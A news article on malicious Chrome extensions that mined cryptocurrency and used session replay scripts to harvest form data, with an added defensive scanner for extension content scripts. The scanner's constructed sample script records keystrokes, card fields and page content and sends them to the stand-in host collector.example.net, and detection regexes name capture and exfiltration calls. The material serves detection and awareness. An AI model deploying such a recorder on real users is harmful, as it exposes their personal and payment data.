If Cryptojacking Wasn’t Enough, Attackers Are Now Using “Session Replay” Scripts to Record Every Movement You Make
In November last year, researchers revealed how analytics firms were invasively tracking website visitors using scripts that record the pages you visit and the searches you make. The research focused on the exfiltration of personal data by so-called session replay scripts. "More and more sites use “session replay” scripts," Princeton researchers warned.
These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers.
It appears that developers of malicious extensions are now incorporating the same mechanism into their latest offerings. "Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder," the researchers had said. Who wouldn't want to look over your shoulder while you browse? Criminals, hackers, advertisers: basically everyone is after more data.
Malicious Chrome extensions deliver cryptocurrency mining code, inject ads, and violate user privacy through session replay scripts
These extensions hijacked browsers to mine Monero, displayed unwanted ads, and also bundled the same kind of session replay script that analytics firms normally use. In the cases the Princeton researchers studied, the recordings went to analytics firms; here it is criminals who get to record and replay your "keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit".
"These libraries are meant to be used to replay a user's visit to a website, so that the site owner can see what the user saw, and what he entered into the machine, among other things," Trend Micro researchers wrote. "Other researchers have raised the possibility that these libraries could be abused, but this is the first time we have seen this in the wild."
The library lets the attackers harvest data entered into forms, including usernames, credit card numbers, CVV numbers, email addresses, and phone numbers. The researchers noted that the legitimate library does not capture password fields, so the attackers do not get passwords this way either. "Droidclub can also modify the contents of viewed websites," the researchers, who refer to the extensions as Droidclub, added.
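To make the recording-and-exfiltration pattern described above concrete, and to give a practitioner something to triage an unpacked extension with, here is a small static heuristic scanner. It is an added example, not code from the article, from Trend Micro or from any replay library: it looks for the behaviours the text describes (listeners on input, pointer and scroll events, a page-content snapshot, and an outbound channel to a host the manifest never names). The manifest, the hostname `collector.example.net` and both content scripts are constructed for this example; the replay-like one also shows why card numbers and CVVs leak while password fields do not.

```javascript
// Added example, not code from the article or from Trend Micro: a small static
// heuristic scanner for browser-extension content scripts that looks for the
// session-replay pattern the article describes (keystroke/input capture, pointer
// and scroll tracking, page-content snapshots, exfiltration to a host the
// manifest never names). Plain Node.js, no dependencies. The manifest, the
// hosts and both content scripts below are constructed for this example.

const INDICATORS = {
  keystrokes: /addEventListener\(\s*['"](?:keydown|keypress|keyup|input)['"]/g,
  pointer:    /addEventListener\(\s*['"](?:mousemove|mousedown|click|touchmove)['"]/g,
  scroll:     /addEventListener\(\s*['"]scroll['"]/g,
  snapshot:   /(?:documentElement|body)\.(?:outerHTML|innerHTML)|new MutationObserver\(/g,
  exfil:      /navigator\.sendBeacon\(|\bfetch\(|XMLHttpRequest|new WebSocket\(/g,
};

// Hostnames appearing as literal http(s) URLs in the script.
function literalHosts(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return hosts;
}

// Hosts the manifest explicitly names, plus whether it asks for every host.
function declaredHosts(manifest) {
  const explicit = new Set();
  let broad = false;
  const patterns = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap(cs => cs.matches || []),
  ];
  for (const p of patterns) {
    const m = /^(?:\*|https?):\/\/([^/]+)\//.exec(p);
    if (p === '<all_urls>' || (m && m[1] === '*')) { broad = true; continue; }
    if (m) explicit.add(m[1].replace(/^\*\./, '').toLowerCase());
  }
  return { explicit, broad };
}

function scanContentScript(manifest, source) {
  const findings = [];
  for (const [indicator, re] of Object.entries(INDICATORS)) {
    const hits = source.match(re);
    if (hits) findings.push({ indicator, count: hits.length });
  }
  const { explicit, broad } = declaredHosts(manifest);
  // With <all_urls> every host is technically "declared", so compare against
  // the explicitly named hosts only: a hard-coded collector domain in a script
  // that runs on every page is exactly what a replay recorder needs.
  const thirdPartyHosts = [...literalHosts(source)].filter(h =>
    ![...explicit].some(d => h === d || h.endsWith('.' + d)));
  const seen = new Set(findings.map(f => f.indicator));
  const captureChannels = ['keystrokes', 'pointer', 'scroll'].filter(n => seen.has(n)).length;
  // Replay needs both recording and a way out: two or more input channels plus
  // an exfiltration primitive. A page snapshot alone is common in benign code.
  const replayLike = captureChannels >= 2 && seen.has('exfil');
  return { findings, thirdPartyHosts, broadHostAccess: broad, replayLike };
}

// Constructed sample: a manifest with broad host access (typical of the
// "runs on every page" extensions the article describes).
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'sample-extension (constructed)',
  permissions: ['<all_urls>', 'storage'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['cs.js'] }],
};

// Constructed content script that behaves like a replay recorder. Note the
// password-field skip: card numbers, CVVs and emails are still recorded.
const REPLAY_LIKE_SCRIPT = `
const buf = [];
const push = (t, d) => buf.push({ t, d, ts: Date.now() });
document.addEventListener('input', e => {
  if (e.target.type === 'password') return; // skipped, everything else is kept
  push('input', { name: e.target.name, value: e.target.value });
});
document.addEventListener('mousemove', e => push('mouse', [e.clientX, e.clientY]));
document.addEventListener('scroll', () => push('scroll', window.scrollY));
push('snapshot', document.documentElement.outerHTML);
setInterval(() => {
  navigator.sendBeacon('https://collector.example.net/r', JSON.stringify(buf.splice(0)));
}, 2000);
`;

// Constructed benign content script for comparison: DOM tweak, no network.
const BENIGN_SCRIPT = `
for (const v of document.querySelectorAll('video')) {
  const a = document.createElement('a');
  a.textContent = 'Download';
  a.href = v.currentSrc;
  v.insertAdjacentElement('afterend', a);
}
`;

console.log(JSON.stringify(scanContentScript(SAMPLE_MANIFEST, REPLAY_LIKE_SCRIPT), null, 2));
console.log(JSON.stringify(scanContentScript(SAMPLE_MANIFEST, BENIGN_SCRIPT), null, 2));
```

Treat the output as triage, not a verdict: string splitting, `eval` or a bundled minifier will defeat these regexes, and `fetch(` by itself appears in plenty of honest code. The signal that survives obfuscation is the network one, which is why the scanner reports every hard-coded host separately: a content script that runs on every page and beacons to a domain unrelated to any of them is worth a manual look regardless of what the rest of the source says.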
As for distribution, the attacker behind this campaign uses malvertising and social engineering to get users to install the malicious Chrome extensions.
Google has removed 89 such extensions from the Chrome Web Store; together they had been installed by 423,992 users. Beyond pulling them from the Store, Google said it has also disabled the extensions on all devices where they were already installed.